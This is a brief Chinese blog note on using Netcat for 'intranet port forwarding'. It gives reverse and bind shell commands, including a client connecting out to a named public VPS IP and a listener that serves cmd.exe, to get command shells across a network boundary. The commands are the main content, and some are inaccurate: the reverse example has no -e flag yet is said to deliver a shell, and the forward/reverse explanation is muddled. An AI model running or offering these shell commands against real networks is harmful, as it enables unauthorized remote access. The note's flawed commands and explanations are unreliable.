Nc內網埠轉發

• 2020 年 4 月 2 日
• 筆記

工具介紹

Netcat工具可在github下載，瑞士軍刀，沒啥好說的老牌工具了（殺軟殺的厲害）

工具使用

反向連接

場景概述：

A主機外網 無法訪問B內網機器

B內網機器 可以訪問A外網機器

A:103.45.99.224(公網vps)

B: 10.211.55.4(內網機器)

A:公網vps執行：

Nc.exe -lvvp 8787

B:內網執行

Nc.exe 103.45.99.224 8787

此時A主機公網vps就會收到B內網主機的cmd

正向連接

場景概述：

A內網 可以訪問 外網B

B外網 不能訪問 內網A

在外網B主機上執行nc -l -p 5555 -e cmd.exe

隨後在內網A上執行nc –nvv 103.45.99.224 5555

註：如果客戶端【相當於內網】連接伺服器【相當於外網】，想獲取伺服器的shell，那麼稱為正向shell，如果是客戶端連接伺服器，伺服器端想獲取客戶端的shell，那麼稱為反向shell，另外有關於nc在linux上的操作是一樣的，更換幾個命令即可